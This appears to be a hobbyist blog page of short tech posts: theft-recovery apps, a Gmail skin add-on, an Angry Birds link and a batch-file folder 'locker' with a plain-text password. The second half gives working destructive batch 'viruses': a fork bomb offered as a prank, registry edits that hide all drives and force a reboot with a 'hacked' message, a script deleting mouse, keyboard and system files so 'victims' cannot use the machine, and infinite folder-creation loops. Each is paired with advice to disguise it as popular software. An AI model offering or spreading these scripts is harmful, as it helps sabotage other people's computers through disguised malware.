slider

Protect your Laptop: Track and Recover

Worried about your stolen Laptop, how to recover your stolen Laptop. Now you can easily Recover your stolen laptop with Prey App. Prey is free theft tracking and recovery software that really works in case of laptop stolen. It allows you to gather information regarding the device’s location, hardware and network status, and optionally trigger specific actions on it. Check out the Guide Below How To Track and Recover Your Stolen Laptop With Prey App.


1. Install the Prey App for Your Windows, Mac OS, Linux, Ubuntu and Android.
Download here

2. Choose new user and create an account by entering information.
(NOTE: You must be connected to the internet before starting the installation)


3. After this You will receive an activation link in you mail box to log in to Control Panel. Activate your account and login with Your User ID and Passeword on its website.


4. Now in Control Panel You can See Your Laptop, In future you can also add more devices by Clicking Add more Device Button.


5. Now go to the Setting panel and Activate activate your protection Like Alerts, Webcam, Screenshot, Lock PC, Alert and all.



6. If you Lost your Laptop than go to Setting Panel and Turn the Missing Option to ON, to get the Detail Report about your Stolen Laptop. 

So this makes your laptop much safer.


Read More(Full Post)...

Play Angry Birds Game Online (requires CHROME)

Angry Birds is one of the most popular mobile game. Firstly it was launched for iPads, iPhones and Android based phones but now it is available on Nokia Ovi stores for Nokia Phones. Now you can Play Angry Birds game online free on Chrome Web Browser. At the Google I/O developer conference, Rovio head Peter Vesterbacka took the stage and demonstrated the popular game played in the Google Chrome browser.

Here are the 2 ways, by which you can Play Angry Birds game online:-

1. You can install Angry Birds game now via the Chrome Web Store. It runs rather nicely, and as an added bonus, remains cached for offline play.


2. Or you can directly play it from Google Chrome browser by Following this Link chrome.angrybirds.com


ENJOY THE GAME!!! 

Read More(Full Post)...

Control Your Lost Android Phone With AndroidLost App

AndroidLost is free Android App which help you to control your Lost Android phone from your PC. It helps you to Sound an alarm on your Phone, send a popup message to your Phone, view the location of your phone on map, read SMS inbox and sent, wipe phone and SD Card, Enable wifi and GPS, take the picture with front camera and forward incoming calls to your new number. It has lots of features which will help you track your Lost android phone and control the device from your PC.
Follow the following Steps:

Download the AndroidLost App from the Android Market and install in your Android Device. Now launch the app and select Request Administrator Rights and Activate it.
 

Now got to the site Androidlost.com and Sign in with your Google ID that you are using in your Android Device, then navigate to the Controls page. Now You can see lots of Option there Like Alarm, Location, Status, Messages, Security, Mobile.
 
  Features 

Alarm
In Alarm option you can select the duration time of Alarm. This feature can start alarm on your Lost Android Phone.

 Location
Next feature is Location, here you can find the location of your phone on a map. Even if the phone is indoor you will get a nearby location by network accuracy. Click the Send Location button and within a few minutes you will get the Map on your Gmail Account.

Status
On Status page, you can get all the details about of your phone like battery level, imei, etc and Enable WiFi and GPS. Click the button and the phone will send the status (battery level, imei, etc) to your email account.

 Messages
 
At messages feature you can send a popup message to your Lost phone. You can also send SMS to any phone number from the PC and also received the mail of the last ten received and last ten sent SMS to the registered Gmail account.  

 Security
 Here in Security feature you can you can Lock your Phone, Wiping Your Phone Remotely and Erse all the Content for your SD Card. You can lock and unlock the phone from the web. If you forget your pincode you can simply overwrite it or remove it by entering an empty pincode on the web.

 Mobile
At Mobile section you can get the last 20 call list on your mail box and also forward the call to another number. One feature we like it here is Front Camera. The phone will take a picture with the front camera and send it to your mail.


Read More(Full Post)...

Change the Look of Gmail with Firefox Addon

If you are bored from the skin of GMAIL and Want to change it, than you have to try the Firefox Addon Google Redesigned. Google Redesigned is a Mozilla Firefox extension designed by Globex Designs that aims to fully redesign the look and feel of popular Google services. This is achieved with Cascading StyleSheet (CSS) files which are loaded on the client’s browser.


 Google Redesigned is built for Mozilla based browsers (Firefox, Flock, IceWeasel, and such). Users using other browsers will not be to install the extension. Firefox 3 and Flock 2 are highly recommended as certain styles will not work correctly on older versions of the Gecko engine. As well the Firefox 3 engine provides much faster performance for handling these styles.
Download FireFox Addon Gmail Redesigned
 

Read More(Full Post)...

How to lock a folder without any software using Batch Programming

In this post I will tell you how to create a simple folder locker which would hide the folder you want to lock. No software required, its just very simple to create it.

cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Enter password to lock folder or for cancel press N
echo (Provided by: www.downloadandlearning.blogspot.com)
set/p "cho=>"
if %cho%==XXXX goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
echo (Provided by: www.downloadandlearning.blogspot.com)
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
echo (Provided by: www.downloadandlearning.blogspot.com)
goto End
:UNLOCK
echo Enter password to Unlock folder
echo (Provided by: www.downloadandlearning.blogspot.com)
set/p "pass=>"
if NOT %pass%==XXXX goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
echo (Provided by: www.downloadandlearning.blogspot.com)
goto End
:FAIL
echo Invalid password.
goto end
:MDLOCKER
md Locker
echo Locker created successfully
echo (Provided by: www.downloadandlearning.blogspot.com)
goto End
:End
  1. Copy this Code into notepad and replace the XXXX with your password.
  2. Save it with .bat extension(for eg: locker.bat).
  3. Copy the Batch file to the place where you want to create your locker folder.
  4. Now double click the Batch file.
  5. Now you can see the Lock folder is created.
  6. Place your files into lock folder which you want to protect.
  7. Again double click the Batch file, it will ask you to enter the password to lock the folder. Enter the password.
  8. Now the folder will be Locked and will become invisible.
  9. To unlock again double click the Batch file, enter the password.
  10. You can see the Lock folder.

Read More(Full Post)...

Create a virus to make the Computer freezed using Batch Programming

Its a simple, easy to remember, one line batch code which would freeze your computer by eating all its virtual memory. When this piece of code is run, the CPU usage goes to 100%. The computer can be brought to its original state by rebooting the system. Its a great code for the beginners and to play prank with friends.

1. Copy the code present in box below in the NOTEPAD. 


%0|%0

2. Save the file with .bat extension(for eg: crazy.bat)

3. For further advancement in it, download a bat to exe converter, through it change the icon, properties and title of the bat file into any popular software.

Read More(Full Post)...

Virus to disable all Hard Disk using Batch Programming

 This is a simple batch program to disable the hard disks in windows.

NOTE:  Don't run or execute the bat file after creating it because it will delete the files from your computer only.  

1. Copy the code present in box below in the NOTEPAD. 


REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n

shutdown -r -c \"Sorry Your System is hacked by us!\" -f

2. Save the file with .bat extension(for eg:disableall.bat)

3. For further advancement in it, download a bat to exe converter, through it change the icon, properties and title of the bat file into any popular software.

For more info, Contact me.

Read More(Full Post)...

Simple Virus to Delete mouse, explorer, logoff, keyboard files

Usually we write simple viruses in batch programming.  This time also I have one Batch Program. It will delete explore.exe, logoff, mouse, keyboard files. So victims can not do anything in his computer.

NOTE:  Don't run or execute the bat file after creating it because it will delete the files from your computer only. 

1. Copy the code present in box below in the NOTEPAD.

@echo off

@if exist c:\windows\system32\mouse del c:\windows\system32\mouse
@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard
copy C:\windows\
@if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe
@if exist C:\program files\internet explorer\iexplore.exe del C:\program files\internet explorer\iexplore.exe

2. Save the file with .bat extension(for eg:deleteall.bat)
3. For further advancement in it, download a bat to exe converter, through it change the icon, properties and title of the bat file into any popular software. 

Read More(Full Post)...

Create a Virus to Create Folder into a Folder(infinitely)

Well you can create a simple computer virus which will create a folder into a folder and so on.
Follow the below steps to create the virus.

1. Copy the code present in box below in the NOTEPAD.

:123
md d
cd d
goto :123

2. Save the file with .bat extension(for eg: folderscreate.bat)
3. Now go to the location where you saved it and run it by double clicking it.
You are done!!
4. For further advancement in it, download a bat to exe converter, through it change the icon, properties and title of the bat file into any popular software. 

Read More(Full Post)...

Create a Virus to Create Infinite Folders in a Drive

Here I will tell you a simple trick to create a simple virus which will create infinite folders into the directory where it is saved, until and unless it is terminated.

1. Copy the code present in box below in the NOTEPAD.

@echo off
:top
md %random%
goto top

"@echo off" - makes it so that it appears to be a blank
screen but actually its making hundreds of folder.
":top" - to create infinite loop.
"md %random%" - is command that creates folders with random names.
"goto top" – return to label 

2. Save the file with .bat extension(for eg: folderscreate.bat)
3. Now go to the location where you saved it and run it by double clicking it.
You are done!!
4. For further advancement in it, download a bat to exe converter, through it change the icon, properties and title of the bat file into any popular software. 

Read More(Full Post)...

Related Posts Plugin for WordPress, Blogger...
 
Download & Learning © 2011 | Contact